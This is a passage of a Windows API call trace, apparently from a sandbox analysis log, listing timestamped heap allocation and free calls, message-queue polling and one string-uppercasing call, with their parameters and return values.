[0119.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0119.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0119.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5a0 | out: hHeap=0x12c0000) returned 1 [0119.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd430 | out: hHeap=0x12c0000) returned 1 [0119.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0119.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0119.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef4f0 | out: hHeap=0x12c0000) returned 1 [0119.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0119.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0119.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef510 | out: hHeap=0x12c0000) returned 1 [0119.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feba0 | out: hHeap=0x12c0000) returned 1 [0119.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0119.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0119.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fed80 | out: hHeap=0x12c0000) returned 1 [0119.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef570 | out: hHeap=0x12c0000) returned 1 [0119.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0119.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd250 | out: hHeap=0x12c0000) returned 1 [0119.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1c0 | out: hHeap=0x12c0000) returned 1 [0119.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6a0 | out: hHeap=0x12c0000) returned 1 [0119.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec90 | out: hHeap=0x12c0000) returned 1 [0119.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0119.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1303e48 | out: hHeap=0x12c0000) returned 1 [0119.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef4e0 | out: hHeap=0x12c0000) returned 1 [0119.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0119.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fedd0 | out: hHeap=0x12c0000) returned 1 [0119.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef550 | out: hHeap=0x12c0000) returned 1 [0119.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fed30 | out: hHeap=0x12c0000) returned 1 [0119.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd220 | out: hHeap=0x12c0000) returned 1 [0119.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef560 | out: hHeap=0x12c0000) returned 1 [0119.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0119.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd160 | out: hHeap=0x12c0000) returned 1 [0119.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0119.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fece0 | out: hHeap=0x12c0000) returned 1 [0119.614] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb28 [0119.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd160 [0119.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6a0 [0119.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd160 | out: hHeap=0x12c0000) returned 1 [0119.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1301030 [0119.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2c8 [0119.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd160 [0119.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef510 [0119.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd160 | out: hHeap=0x12c0000) returned 1 [0119.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb00 [0119.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2e0 [0119.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6c0 [0119.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5b0 [0119.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x13011f0 [0119.615] CharUpperBuffW (in: lpsz="DJVLLWQLKATZJRZPICPARXZ", cchLength=0x17 | out: lpsz="DJVLLWQLKATZJRZPICPARXZ") returned 0x17 [0119.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13011f0 | out: hHeap=0x12c0000) returned 1 [0119.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5b0 | out: hHeap=0x12c0000) returned 1 [0119.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb50 [0119.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef6b0 [0119.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec90 [0119.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0119.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef4e0 [0119.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0119.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef4e0 | out: hHeap=0x12c0000) returned 1 [0119.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef4e0 [0119.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd160 [0119.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef550 [0119.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0119.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef550 | out: hHeap=0x12c0000) returned 1 [0119.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0119.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fed80 [0119.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1c0 [0119.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef550 [0119.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0119.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0119.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fedd0 [0119.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd280 [0119.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef560 [0119.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd220 [0119.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0119.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x14a3268 [0119.616] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef88 [0119.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0119.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef570 [0119.616] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0119.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee48 [0119.617] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd238 [0119.617] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd268 [0119.617] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef4f0 [0119.617] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd268 | out: hHeap=0x12c0000) returned 1 [0119.617] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef4f0 | out: hHeap=0x12c0000) returned 1 [0119.617] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.617] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feba0 [0119.617] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd250 [0119.617] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd250 | out: hHeap=0x12c0000) returned 1 [0119.617] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0119.617] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.618] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5a0 | out: hHeap=0x12c0000) returned 1 [0119.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5a0 | out: hHeap=0x12c0000) returned 1 [0119.618] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0119.618] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5b0 | out: hHeap=0x12c0000) returned 1 [0119.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5a0 | out: hHeap=0x12c0000) returned 1 [0119.619] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0119.619] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd490 | out: hHeap=0x12c0000) returned 1 [0119.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0119.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5c0 | out: hHeap=0x12c0000) returned 1 [0119.619] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5c0 | out: hHeap=0x12c0000) returned 1 [0119.619] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5c0 | out: hHeap=0x12c0000) returned 1 [0119.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5c0 | out: hHeap=0x12c0000) returned 1 [0119.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0119.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0119.619] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0119.619] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918b8 | out: hHeap=0x12c0000) returned 1 [0119.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0119.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5c0 | out: hHeap=0x12c0000) returned 1 [0119.620] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a58 | out: hHeap=0x12c0000) returned 1 [0119.620] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0119.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0119.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5c0 | out: hHeap=0x12c0000) returned 1 [0119.620] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0119.620] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0119.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0119.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5c0 | out: hHeap=0x12c0000) returned 1 [0119.621] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0119.621] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b18 | out: hHeap=0x12c0000) returned 1 [0119.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0119.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5c0 | out: hHeap=0x12c0000) returned 1 [0119.621] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0119.621] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919b8 | out: hHeap=0x12c0000) returned 1 [0119.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0119.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5c0 | out: hHeap=0x12c0000) returned 1 [0119.621] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458f98 | out: hHeap=0x12c0000) returned 1 [0119.621] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0119.622] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0119.622] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5c0 | out: hHeap=0x12c0000) returned 1 [0119.622] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.622] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458f98 | out: hHeap=0x12c0000) returned 1 [0119.622] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.622] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.622] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.622] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.622] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.622] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.622] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.622] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.623] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.623] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.623] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.623] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.623] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.623] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.623] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.623] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.623] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.623] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.623] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.623] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.623] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.623] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.623] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.624] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.624] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.624] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.624] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.624] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.624] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.624] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.624] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.624] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.624] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.624] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.624] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.624] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.624] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.625] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.625] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.625] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.625] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.625] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.625] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.625] PeekMessageW (in: lpMsg=0x7df794, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df794) returned 0 [0119.625] PeekMessageW (in: lpMsg=0x7df794, 